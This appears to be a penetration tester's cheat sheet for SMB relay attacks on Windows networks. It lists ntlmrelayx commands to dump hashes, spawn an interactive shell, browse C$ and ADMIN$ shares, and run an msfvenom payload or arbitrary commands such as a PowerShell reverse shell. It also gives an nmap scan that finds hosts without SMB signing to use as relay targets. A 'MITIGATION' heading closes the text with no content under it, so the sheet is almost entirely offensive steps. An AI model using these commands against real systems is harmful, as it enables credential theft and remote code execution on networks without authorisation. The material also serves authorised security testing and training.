SMB Relay

python ntlmrelayx.py -tf targets.txt -smb2support >> main command to be run in order to dump the hashes (if the hash relayed is an admin hash)

python ntlmrelayx.py -tf targets.txt -smb2support -i >> spawning a shell

>> open a new tab and start a nc 127.0.0.1 <port> (11000 or 11001)

shares >> shows shared folders

use C$ >> go into the specific shared folder

use ADMIN$ >> will take you in system32 folder of the OS

python ntlmrelayx.py -tf targets.txt -smb2support -e run.exe (created with msfvenon = payload) and spawn a metasploit shell

python ntlmrelayx.py -tf targets.txt -smb2support -c (command to be run, eventually a powershell reverse shell command)

Check for SMB signin:

nmap --script=smb2-security-mode.nse -p445 10.10.10.0/24

add the address with the "enabled but not required" in a .txt file

MITIGATION